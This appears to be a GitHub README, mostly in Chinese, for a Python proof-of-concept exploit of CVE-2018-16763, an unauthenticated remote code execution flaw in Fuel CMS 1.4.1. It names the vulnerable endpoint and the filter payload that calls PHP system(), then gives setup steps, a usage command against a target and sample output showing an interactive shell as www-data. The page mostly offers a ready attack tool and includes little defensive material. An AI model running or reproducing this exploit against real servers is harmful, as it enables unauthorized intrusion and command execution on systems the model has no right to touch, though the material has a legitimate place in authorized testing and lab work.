estebanzarate/CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC
GitHub: estebanzarate/CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC
这是一个针对Fuel CMS 1.4.1版本未授权远程代码执行漏洞的概念验证工具,能够自动化验证漏洞并建立交互式Shell。
Stars: 0 | Forks: 0
# CVE-2018-16763 — Fuel CMS 1.4.1 远程代码执行 (PoC)
## 工作原理
1. 发送一个 GET 请求到 `/fuel/pages/select/`,其中包含一个精心构造的 `filter` 载荷,该载荷会调用 PHP 的 `system()` 函数执行指定命令。
2. 使用正则表达式从 HTTP 响应中解析反射的输出。
3. 将命令输出直接返回给交互式 Shell。
## 环境要求
- Python 3
- 安装依赖:
```
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
```
## 使用方法
```
python3 exploit.py -t http://TARGET
```
**示例:**
```
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit
```
## 参考资料
- [CVE-2018-16763](https://nvd.nist.gov/vuln/detail/CVE-2018-16763)
- [EDB-47138](https://www.exploit-db.com/exploits/47138)
## 致谢
- **发现与原始漏洞利用:** Syed Sheeraz Ali
- **代码优化与交互式 Shell:** [Esteban Zárate](https://github.com/estebanzarate)
标签:CISA项目, CVE, CVE-2018-16763, Exploit, Fuel CMS, Maven, PoC, Python, RCE, Shell, Web安全, 代码执行, 后门, 命令执行, 安全, 数字签名, 无后门, 暴力破解, 未经身份验证, 漏洞验证, 编程工具, 网络安全, 自动化攻击, 蓝队分析, 超时处理, 远程代码执行, 隐私保护